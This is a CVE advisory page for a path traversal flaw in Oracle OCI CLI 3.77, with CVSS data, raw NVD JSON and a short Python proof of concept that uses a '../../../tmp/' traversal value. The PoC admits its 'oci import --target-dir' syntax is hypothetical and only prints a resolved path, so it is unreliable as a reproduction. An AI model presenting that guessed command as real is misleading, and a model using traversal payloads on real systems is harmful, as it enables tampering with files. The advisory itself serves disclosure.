Security Vulnerability Report
CVE-2026-35254 CVSS 6.1 MEDIUM

CVE-2026-35254

Published: 2026-05-06 08:16:04
Last Modified: 2026-05-06 20:30:45

Description

Vulnerability in the Oracle OCI CLI product of Oracle Open Source Projects. The supported version that is affected is 3.77. Easily exploitable vulnerability allows unauthenticated attacker with network access to compromise Oracle OCI CLI. Successful attacks of this vulnerability can result in Oracle OCI CLI allowing users to place imported files outside the intended directory.

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:oracle:cloud_infrastructure_cli:3.77:*:*:*:*:*:*:* - VULNERABLE
Oracle OCI CLI 3.77

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-35254: Path Traversal in Oracle OCI CLI
# This script demonstrates the concept of exploiting the path traversal vulnerability
# by attempting to place a file outside the intended directory.
import os
import subprocess


def exploit_path_traversal():
    # Simulating the vulnerable CLI command
    # The vulnerability lies in the '--file' or '--output-dir' parameter accepting path traversal sequences
    vulnerable_cli_path = "oci"  # Assuming 'oci' is in the system PATH

    # Intended directory for import
    intended_dir = "/home/user/oci_imports"

    # Malicious path using traversal sequences to write outside the intended directory
    # Example: writing to /tmp/malicious_payload.txt
    malicious_payload = "../../../tmp/malicious_payload.txt"

    # Construct the command (hypothetical command structure based on the vulnerability description)
    # Note: actual command syntax depends on the specific vulnerable CLI function
    # os.path.join is used so the traversal sequence is appended as a path component
    # rather than glued onto the directory name
    command = [
        vulnerable_cli_path,
        "import",
        "--file", "test_data.json",
        "--target-dir", os.path.join(intended_dir, malicious_payload),
    ]

    print("[*] Attempting to trigger path traversal...")
    print(f"[*] Command: {' '.join(command)}")

    try:
        # In a real exploitation scenario, this would execute the command
        # result = subprocess.run(command, check=True, capture_output=True)
        resolved = os.path.abspath(os.path.join(intended_dir, malicious_payload))
        print(f"[+] If vulnerable, file would be written to: {resolved}")
    except Exception as e:
        print(f"[-] Error executing command: {e}")


if __name__ == "__main__":
    exploit_path_traversal()

References

https://www.oracle.com/security-alerts/all-oracle-cves-outside-other-oracle-public-documents.html (source: NVD reference entry, tagged "Not Applicable")
Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-35254", "sourceIdentifier": "[email protected]", "published": "2026-05-06T08:16:03.697", "lastModified": "2026-05-06T20:30:44.910", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle OCI CLI product of Oracle Open Source Projects. The supported versions that is affected is 3.77. Easily exploitable vulnerability allows unauthenticated attacker with network access to compromise Oracle OCI CLI. Successful attacks of this vulnerability can result in Oracle OCI CLI allowing users to place imported files outside the intended directory."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:cloud_infrastructure_cli:3.77:*:*:*:*:*:*:*", "matchCriteriaId": "1BD5ED05-366E-4131-8526-3F2D62AA75EE"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/all-oracle-cves-outside-other-oracle-public-documents.html", "source": "[email protected]", "tags": ["Not Applicable"]}]}}